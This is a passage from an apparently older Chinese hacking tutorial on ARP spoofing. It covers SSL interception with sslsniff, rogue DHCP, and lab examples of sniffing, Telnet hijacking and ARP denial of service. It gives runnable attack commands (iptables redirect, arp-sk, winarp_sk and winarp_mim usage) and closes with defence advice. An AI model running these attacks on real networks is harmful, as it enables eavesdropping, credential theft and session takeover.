接著， 我為所需要認(rèn)證的域產(chǎn)生一個(gè)證書(shū)， 并用我申請(qǐng)的CA證書(shū)為其簽名：

[CA頒發(fā)者：VeriSign / 信任授權(quán)體：VeriSign]

->[CA頒發(fā)者：VeriSign / 信任授權(quán)體：www.hackerxfiles.net]

->[CA頒發(fā)者：www.hackerxfiles.net / 信任授權(quán)體：www.163.com]

由于IE不對(duì)www.hackerxfiles.net中介證書(shū)進(jìn)行基本約束檢查， 因此它承認(rèn)www.163.com的證書(shū)合法性。 OK， 發(fā)覺(jué)沒(méi)有？任何擁有權(quán)威CA簽名證書(shū)的用戶(hù)可以對(duì)其他人進(jìn)行“合法欺騙”！�。�！

熟悉這個(gè)漏洞后， 設(shè)計(jì)的MIM SSL會(huì)話(huà)劫持攻擊原理圖如下：

# 安裝sslsniff-0.4.tar.gz

[root@hackersvr tools]#tar zxvf sslsniff-0.4.tar.gz

[root@hackersvr sslsniff-0.4]# make

# 這里可以把合法的SSL數(shù)字證書(shū)和私鑰合并到文件偽造證書(shū)， 也可以使用軟件本身附帶的

# trust.crt文件作為偽造證書(shū)， 完成與可戶(hù)端的SSL握手。

# 監(jiān)聽(tīng)443端口請(qǐng)求并重定向其到5555， 并使用偽造證書(shū)進(jìn)行欺騙

[root@hackersvr sslsniff-0.4]# ./sslsniff –p 5555 –c trust.crt

# 建立數(shù)據(jù)代理轉(zhuǎn)發(fā)機(jī)制

[root@hackersvr sslsniff-0.4]＃e cho 1 > /proc/sys/net/ipv4/ip_forward

[root@hackersvr sslsniff-0.4]#iptables –t nat –A PREROUTING –p tcp –destination-port 443 –j REDIRECT –to-ports 5555

# 利用arp-sk對(duì)目標(biāo)主機(jī)進(jìn)行ARP欺騙攻擊， 目標(biāo)主機(jī)將通過(guò)攻擊者主機(jī)代理所有數(shù)據(jù)。

arp-sk -r –d 192.168.1.2 -S 192.168.1.3 -D 192.168.1.2

# 至此， 整個(gè)竊聽(tīng)體系建立完畢

# 在攻擊者收到客戶(hù)端的連接， 將制造一個(gè)到真實(shí)安全站點(diǎn)的連接， 并查詢(xún)服務(wù)器的證書(shū)信息。

# SSLsniff產(chǎn)生一個(gè)中介CA數(shù)字證書(shū)， 并用合法的trust.crt簽名， 使其成為合法終端實(shí)體用戶(hù)

# 證書(shū)。 Sslsniff使用產(chǎn)生的證書(shū)認(rèn)證鏈路與客戶(hù)實(shí)現(xiàn)SSL握手認(rèn)證并代理期間的任何數(shù)據(jù)。

# 由于IE設(shè)計(jì)SSL認(rèn)證鏈路的漏洞， 瀏覽器并不會(huì)提出任何警告。 其攻擊方式的新穎另人嘆服。

# 對(duì)于IE5和IE5.5版本， 漏洞攻擊是非常輕松的。 而IE6而言， 則需要選擇適合的權(quán)威機(jī)構(gòu)CA

# 簽名， VeriSign頒發(fā)的證書(shū)中， 其CA基本約束沒(méi)有設(shè)置任何信息；而Thawte頒發(fā)的證書(shū)則明確

# 設(shè)置了”Basic Constraint CA = FALSE”。 如果IE6發(fā)現(xiàn)這樣的設(shè)置并不會(huì)跟從數(shù)字證書(shū)認(rèn)證

# 鏈路。 則無(wú)法實(shí)現(xiàn)竊聽(tīng)， 反之則可順利監(jiān)聽(tīng)I(yíng)E內(nèi)SSL的一切數(shù)據(jù)活動(dòng)。

通過(guò)精巧的方式， 加密技術(shù)變的無(wú)所適從， 于是一切疑惑又回到“信息保密是管理問(wèn)題？還是技術(shù)問(wèn)題？”的無(wú)盡爭(zhēng)論中。

(附：非常感謝Mike Benham對(duì)本節(jié)內(nèi)容的技術(shù)指導(dǎo)和email中為我解答的幾個(gè)疑惑問(wèn)題， 在此表示致敬)

*利用DHCP攻擊

DHCP的設(shè)計(jì)的確為網(wǎng)絡(luò)管理員的懶惰帶來(lái)良好的借口。 使用DHCP動(dòng)態(tài)分配主機(jī)IP的方式， 使的局域網(wǎng)絡(luò)的管理也簡(jiǎn)潔很多。

為能以清晰的概念如何利用DHCP服務(wù)進(jìn)行攻擊， 首先了解下DHCP服務(wù)器是如何動(dòng)態(tài)分配的：

1、 客戶(hù)端發(fā)送一個(gè)DHCP的偵察包(discovery)給服務(wù)器， 其中包含請(qǐng)求IP地址的信息。 客戶(hù)端的網(wǎng)卡接口或許會(huì)請(qǐng)求它原來(lái)所租用的IP地址。

2、 服務(wù)器發(fā)送DHCP供應(yīng)包(offer)， 通知所提供的IP地址給客戶(hù)端。

3、 客戶(hù)端發(fā)送DHCP請(qǐng)求包(request)， 通知DHCP服務(wù)器客戶(hù)端需要服務(wù)器所提供的IP地址。

4、 服務(wù)器發(fā)送DHCP確認(rèn)包(ack)， 確認(rèn)客戶(hù)端已發(fā)送的申請(qǐng)要求。 客戶(hù)端綁定服務(wù)器所提供的IP地址。

5、 客戶(hù)端綁定默認(rèn)網(wǎng)關(guān)， DNS服務(wù)等DHCP所提供的網(wǎng)絡(luò)設(shè)置。

掌握DHCP服務(wù)的運(yùn)作原理后， 我們能做些什么？(學(xué)者會(huì)繼續(xù)深究這個(gè)原理；而黑客卻會(huì)思考如何利用這個(gè)原理， 這也許就是學(xué)者與黑客的區(qū)別之一吧)。 每個(gè)網(wǎng)絡(luò)里獨(dú)立存在一臺(tái)DHCP服務(wù)器進(jìn)行IP動(dòng)態(tài)分址服務(wù)， 假如在加入一臺(tái)DHCP， 效果怎樣？于是網(wǎng)絡(luò)中爆發(fā)了DHCP服務(wù)大戰(zhàn)， 誰(shuí)勝利誰(shuí)就占有主機(jī)的分配權(quán)。 那么制造一臺(tái)DHCP服務(wù)器， 并使其贏得分配權(quán)， 則可以對(duì)主機(jī)設(shè)置虛假的網(wǎng)關(guān)和虛假DNS服務(wù)， 輕松的實(shí)現(xiàn)MIM攻擊(絕對(duì)的好思路?)。

當(dāng)然， 上述的做法過(guò)于野蠻， 另一種精致的做法使：利用ARP欺騙攻擊可以從DHCP服務(wù)器中偷竊一部分可租用的IP地址(過(guò)份的做法是全部偷竊， 欺騙正常DHCP其租用空間滿(mǎn)載)。 偽造DHCP服務(wù)器， 并使用欺騙所獲得的IP地址進(jìn)行分配活動(dòng)。 而客戶(hù)端將得到攻擊者偽造的默認(rèn)網(wǎng)關(guān)和偽造的DNS服務(wù)器。 在偽造默認(rèn)網(wǎng)關(guān)實(shí)現(xiàn)監(jiān)聽(tīng)；或使用偽造DNS重定向用戶(hù)HTTP訪(fǎng)問(wèn)到黑帽的服務(wù)器， 進(jìn)行應(yīng)用級(jí)的偷竊活動(dòng)。 一切依然簡(jiǎn)單， 而且使用的也僅僅是簡(jiǎn)單的ARP攻擊。

下面來(lái)看看另一種有意思的攻擊方式——偷竊主機(jī)“身份標(biāo)識(shí)”。

許多主機(jī)都喜歡DHCP分配相同的IP地址。 而管理員則維護(hù)了一張MAC-IP的地址列表以便于這種固定的分配。 那么通過(guò)對(duì)一個(gè)指定主機(jī)的MAC地址進(jìn)行欺騙， 并請(qǐng)求正確的IP地址， 那么這個(gè)主機(jī)的身份標(biāo)識(shí)將被偷竊。 為了實(shí)現(xiàn)這個(gè)目的， 首先將目標(biāo)機(jī)器Dos攻擊。 并在目標(biāo)機(jī)器重新啟動(dòng)前， 對(duì)DHCP實(shí)施IP請(qǐng)求， 偷竊目標(biāo)身份標(biāo)識(shí)。 一旦偷竊成功， 則此狀態(tài)將存于DHCP的MAC-IP地址列表中。 (偷取目標(biāo)主機(jī)的身份標(biāo)識(shí)當(dāng)然為了是采用借刀殺人， 栽贓陷害的假名攻擊方法)。

實(shí)現(xiàn)原理如下：

從攻擊原理圖知道， 具體實(shí)現(xiàn)分為三步：

1、 對(duì)目標(biāo)主機(jī)實(shí)行ARP拒絕服務(wù)攻擊。

2、 在機(jī)器重新啟動(dòng)前， 偷竊目標(biāo)主機(jī)所分配的IP地址， 使目標(biāo)主機(jī)更新其原有地址。

3、 啟動(dòng)偽造DHCP服務(wù)器， 希望在DHCP爭(zhēng)奪戰(zhàn)能分配IP地址。

(注：其攻擊實(shí)現(xiàn)的代碼程序我已收錄到tools工具包， 請(qǐng)參閱相關(guān)目錄)

如果局域網(wǎng)絡(luò)中使用DHCP服務(wù)進(jìn)行IP分址服務(wù)， 那么進(jìn)行ARP欺騙行為的攻擊是相當(dāng)容易的， 除非網(wǎng)絡(luò)管理員在DHCP服務(wù)器對(duì)主機(jī)的IP地址和MAC進(jìn)行綁定， 但這樣一來(lái)， 使管理網(wǎng)絡(luò)變的復(fù)雜化一些。 因此從某種意義上說(shuō)， 網(wǎng)絡(luò)安全和管理方便之間是一對(duì)矛盾體， 越安全的網(wǎng)絡(luò)環(huán)境， 其管理辛勞程度自然也加大很多。

當(dāng)掌握理論的時(shí)候， 就該推進(jìn)到如何利用的階段了， 這也是互連網(wǎng)Howto熱門(mén)起來(lái)的原由之一。

四、 具體入侵實(shí)例

本節(jié)將給出具體實(shí)例， 分別實(shí)現(xiàn)MIM嗅探數(shù)據(jù)、TCP會(huì)話(huà)劫持和DoS攻擊。 雖然操作簡(jiǎn)單， 但考慮到對(duì)網(wǎng)絡(luò)的危害比較大， 請(qǐng)有興趣的朋友搭建實(shí)驗(yàn)環(huán)境進(jìn)行測(cè)試， 不要在正常的交互網(wǎng)絡(luò)進(jìn)行這些非法行為(由于前面部分分析了這些攻擊行為的原理， 這里只敘述攻擊流程， 不在詳述其原理)。

(另注：本小節(jié)的實(shí)現(xiàn)是在土豆大哥的善意指點(diǎn)下而完成的。 這些中肯的意見(jiàn)讓我能認(rèn)真的面對(duì)寫(xiě)作， 盡量把一些肯綮難解的思想寫(xiě)的通俗易懂， 不辜負(fù)喜歡看我文章的讀者， 也在此對(duì)土豆大哥致禮)

網(wǎng)絡(luò)環(huán)境

用戶(hù)    IP:192.168.1.36(win2k)

服務(wù)器  IP:192.168.1.244(win2k)

攻擊者  IP:192.168.1.246(Redhat7.2)

(注：三臺(tái)機(jī)器是連在同一個(gè)交換機(jī))

1、 MIM嗅探數(shù)據(jù)實(shí)例

* 獲取服務(wù)器和目標(biāo)主機(jī)的MAC地址

* 分別對(duì)服務(wù)器和目標(biāo)主機(jī)實(shí)現(xiàn)ARP欺騙

* 開(kāi)啟IP轉(zhuǎn)發(fā)， 并實(shí)施嗅探

從截圖， 我們可以看見(jiàn)攻擊者(192.168.1.246)在三層網(wǎng)絡(luò)環(huán)境下重定向并嗅嘆了用戶(hù)(192.168.1.36)到WEB服務(wù)器(192.168.1.244)的HTTP會(huì)話(huà)過(guò)程。 編輯Ethereal的捕捉規(guī)則還可以嗅嘆POP3、Telnet和Ftp等登錄過(guò)程， 從而輕松獲取帳戶(hù)。

2、 TCP會(huì)話(huà)劫持實(shí)例

  使用和MIM嗅嘆同樣的方法獲取MAC地址， 并對(duì)主機(jī)實(shí)行ARP欺騙攻擊。 接著， 劫持一個(gè)監(jiān)測(cè)的會(huì)話(huà)， 利用合法用戶(hù)進(jìn)行連接并通過(guò)驗(yàn)證， 使攻擊者合法接管會(huì)話(huà)過(guò)程。

  * 使用hunt監(jiān)測(cè)并劫持一個(gè)Telnet會(huì)話(huà)

* 在劫持過(guò)程中， 接管會(huì)話(huà)并修改發(fā)送命令

整個(gè)Telnet劫持會(huì)話(huà)中， 發(fā)送一個(gè)mkdir test命令， 欺騙服務(wù)器認(rèn)為此命令是合法用戶(hù)發(fā)送的， 因此接受此命令操作， 會(huì)話(huà)劫持完成。 此類(lèi)操作及其簡(jiǎn)單， 但可以假冒合法用戶(hù)進(jìn)行正常的服務(wù)器操作， 威脅性巨大。

3、 DoS攻擊實(shí)例

* 對(duì)主機(jī)發(fā)送大量偽造ARP reply數(shù)據(jù)包， 導(dǎo)致其認(rèn)為192.168.1.20已經(jīng)“死亡”。

* 受害主機(jī)截圖

此刻， 主機(jī)已經(jīng)無(wú)法Ping通192.168.1.20的地址， ARP的DoS攻擊完成。

  * 數(shù)據(jù)包截圖分析

從截圖可以發(fā)現(xiàn)不斷向192.168.1.36發(fā)送隨機(jī)Mac刷新其記錄中192.168.1.20的幻存記錄， 導(dǎo)致其無(wú)法對(duì)192.168.1.20進(jìn)行正常網(wǎng)絡(luò)訪(fǎng)問(wèn)。 這種簡(jiǎn)單的阻斷攻擊不但造成網(wǎng)絡(luò)中Arp-reply的廣播風(fēng)暴， 導(dǎo)致網(wǎng)絡(luò)性能下降；嚴(yán)重還會(huì)讓整個(gè)三層交換網(wǎng)絡(luò)陷落于無(wú)窮的“絕緣”狀態(tài)之中。

4、 windows平臺(tái)ARP欺騙實(shí)現(xiàn)

考慮到許多讀者還未接觸過(guò)Linux或者對(duì)其來(lái)不太了解， 因此本節(jié)將介紹兩個(gè)關(guān)于Windows平臺(tái)下實(shí)現(xiàn)Arp攻擊的小工具：winarp_sk和win_mim(兩款軟件需要wincap包的支持， 已經(jīng)收錄到tools軟件包)。

Winarp_sk是arp_sk的Windows平臺(tái)實(shí)現(xiàn)， 其設(shè)計(jì)思想和arp_sk別無(wú)二致， 只不過(guò)是在windows平臺(tái)實(shí)現(xiàn)此類(lèi)攻擊。 下面介紹其使用方法， 感興趣的讀者可以根據(jù)前面所熟悉的攻擊方式在windows平臺(tái)下進(jìn)行攻擊測(cè)試。

winarp_sk.exe -m mode [-D dst_ether_addr] [-S src_ether_addr]

                   [-F sender_MAC] -d sender_IP [-T target_MAC]

                    -s target_IP [-t delay] [-c count]

-S: 以Windows格式設(shè)置數(shù)據(jù)包MAC源地址。

   如果不做任何設(shè)置， 將發(fā)送本機(jī)的MAC地址。

-D: 以Windows格式設(shè)置數(shù)據(jù)包MAC源地址。

   一般使用參數(shù)-d所指定主機(jī)的MAC地址。

注意: Windows下面MAC地址的形式為: XX-XX-XX-XX-XX-XX

-m: 設(shè)置發(fā)送ARP類(lèi)型包

   1 : 制作一個(gè)ARP-request數(shù)據(jù)包

   2 : 制作一個(gè)ARP-reply數(shù)據(jù)包

-F: 設(shè)置發(fā)送主機(jī)的MAC地址

   默認(rèn)使用本地主機(jī)MAC進(jìn)行發(fā)送

-s: 設(shè)置發(fā)送主機(jī)的IP地址

-T: 設(shè)置目標(biāo)主機(jī)的MAC地址

-d: 設(shè)置目標(biāo)主機(jī)的IP地址

舉例一：

winarp_sk.exe -m 2 -s 192.168.1.1 -d 192.168.1.10

+ ETH - Destination MAC : 00-10-B5-AC-1D-00

+ ETH - Source MAC      : 00-60-08-DE-64-F0

+ ARP - ARP Reply

+ ARP - Sender MAC address : 00-60-08-DE-64-F0

+ ARP - Sender IP address  : 192.168.1.1

+ ARP - Target MAC address : 00-10-B5-AC-1D-00

+ ARP - Target IP address  : 192.168.1.10

這個(gè)例子中發(fā)送一個(gè)Arp-relay的數(shù)據(jù)包， 欺騙192.168.1.10， 使其ARP中毒， 認(rèn)為192.168.1.1的MAC地址為：00-10-B5-AC-1D-00。 對(duì)于win 9x/2K操作系統(tǒng)， 這是非常簡(jiǎn)單的中毒更新攻擊。

舉例二：

winarp_sk -m 1 -s 192.168.1.1 -d 192.168.1.11

+ ETH - Destination MAC : 00-A0-C9-41-DB-1B

+ ETH - Source MAC      : 00-60-08-DE-64-F0

+ ARP - ARP Request

+ ARP - Sender MAC address : 00-60-08-DE-64-F0

+ ARP - Sender IP address  : 192.168.1.1

+ ARP - Target MAC address : 00-A0-C9-41-DB-1B

+ ARP - Target IP address  : 192.168.1.11

這也是ARP中毒更新的具體實(shí)例， 可以有效的攻擊Linux/Win XP(或其他系統(tǒng))。

Winarp_mim小工具則顧名思義， mim是中間人攻擊的英文縮寫(xiě)， 用其可方便實(shí)現(xiàn)。 但是使用之前， 必須預(yù)先安裝wincap驅(qū)動(dòng)包。 其工作方式分三步實(shí)現(xiàn)：

1、分別對(duì)目標(biāo)主機(jī)A和B發(fā)送ARP-request數(shù)據(jù)包。 對(duì)目標(biāo)A發(fā)送目標(biāo)B的IP地址和攻擊者主機(jī)的MAC地址， 反之對(duì)目標(biāo)B發(fā)送目標(biāo)A的IP地址和攻擊者的MAC地址。

2、對(duì)A和B中使用大量偽造的ARP欺騙包使其緩存保持虛假信息。

4、 攻擊終止， 必須還原主機(jī)A/B中的真實(shí)IP/MAC綁定地址， 避免因攻擊結(jié)束而造成A/B間無(wú)法通信的現(xiàn)象。

winarp_mim.exe -a target_a_ip -b target_b_ip

                    [-t delay] [-c count] [-v]

-a: 目標(biāo)主機(jī)A的IP地址。

-b: 目標(biāo)主機(jī)B的IP地址。

-c: 設(shè)置發(fā)送ARP包的數(shù)目。

   默認(rèn)情況是不斷發(fā)送， 直到按任意鍵停止發(fā)送。

-t: 發(fā)送包的時(shí)間間隔， 以毫秒為單位。 默認(rèn)情況是2000毫秒。

-h: 幫助命令。

-v: 發(fā)送包過(guò)程中的信息顯示開(kāi)關(guān)。

注意：

假如攻擊主機(jī)使用IP路由功能， MIM攻擊才能透明的進(jìn)行。

Windows系統(tǒng)中激活路由功能的方法：

1- Windows NT :在 TCP/IP 控制面版中進(jìn)行配置

2- Windows 2000 : 修改或者創(chuàng)建如下鍵值

SYSTEM\CurrentControlSet\Services\Tcpip\Parameters

設(shè)置鍵IPEnableRouter=1

3- Windows 9x : 修改或者創(chuàng)建如下鍵值

\HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Vxd\Mstcp\

設(shè)置鍵EnableRouting=1， 其字符類(lèi)型為string

(注意: "EnableRouting" 是區(qū)分大小寫(xiě))

分析了目前比較流行的ARP攻擊方式， 是否有種大汗淋漓的恐慌呢？如何面對(duì)這種殘酷戰(zhàn)爭(zhēng)？如何才能讓自己暫時(shí)安全？下面的建議興許能提供一些庇護(hù)措施。

五、 安全防御建議

對(duì)于局域網(wǎng)絡(luò)的欺騙攻擊隱秘性的攻擊行為， 如何才能保證信息的相對(duì)安全和隱私權(quán)的私屬性呢？經(jīng)過(guò)ARP欺騙攻擊行為的分析， 如下措施可以較好的抵御這種可恥的偷竊行為。

1、 在本地計(jì)算機(jī)使用靜態(tài)ARP映像記錄， 特別本地網(wǎng)關(guān)記錄應(yīng)該是靜態(tài)的。 使用arp -s添加靜態(tài)映射列表。 抑制ARP的幻存中毒更新。 (但對(duì)于大型網(wǎng)絡(luò)， 維護(hù)這樣的MAC/IP表使非常困難的， 如果某臺(tái)機(jī)器的網(wǎng)卡壞了， 調(diào)整MAC/IP的映射是及其煩瑣的)

2、 使用反向ARP解析， 找出同一MAC地址IP的來(lái)源(即使用RARP反向解析MAC為IP地址)。

3、 在交換機(jī)中使用Port/Mac的綁定功能， 比如使能Port Security特性， 每個(gè)端口只允許一個(gè)MAC映射， 防止多個(gè)MAC地址對(duì)一個(gè)交換端口的映射， 從而減少嗅嘆的可能性。

4、使用ARPWATCH工具監(jiān)測(cè)IP/MAC地址表的變化。 其記錄日志于/var/log/messages， 形式為：

Sep 1 16:26:04 hostB arpwatch: changed ethernet address 192.168.1.3

04.04.04.04.04.04 (03.03.03.03.03.03)

表示MAC從原來(lái)的03.03.03.03.03.03變更為04.04.04.04.04.04， 這意味著ARP攻擊的征兆， 需要引起高度注意。

5、 避免使用DHCP服務(wù)器進(jìn)行網(wǎng)絡(luò)的動(dòng)態(tài)分址管理， 因?yàn)樵谶@樣的環(huán)境中使用ARP欺騙攻擊是很難被發(fā)現(xiàn)的。

6、 在基于安全會(huì)話(huà)的通信過(guò)程中， 不要使用有安全漏洞的軟件。

7、 安裝snort入侵檢測(cè)系統(tǒng)， 通過(guò)使用arp欺騙預(yù)處理器偵測(cè)欺騙行為并發(fā)送郵件警告通知arp/ip的改變。

8、尋找Arp攻擊主機(jī)， 以Redhat為例：

nmap -sP {your local network}

arp -an awk '{print $2 $4}' sort uniq -c grep -v '1'

在DNS記錄中查看其主機(jī)地址找出攻擊者， 制止攻擊行為。

六、 小結(jié)

使用ARP協(xié)議漏洞所產(chǎn)生的攻擊方式是非常隱蔽的， 這種攻擊所造成的危害卻是非常巨大的， 任何在網(wǎng)絡(luò)流通的數(shù)據(jù)資料將被攻擊者一覽無(wú)余， 而受害者卻可能根本不知道自己已經(jīng)受到了嚴(yán)重的窺視。 由于協(xié)議而使網(wǎng)絡(luò)本身具有的脆弱性， 因此在時(shí)刻警惕網(wǎng)絡(luò)的同時(shí)， 最全面的做法在于改進(jìn)協(xié)議的安全特性并不斷提高人的修養(yǎng)素質(zhì)， 使網(wǎng)絡(luò)的文明升級(jí)為一個(gè)資源共享， 信息自由和尊重隱私的時(shí)代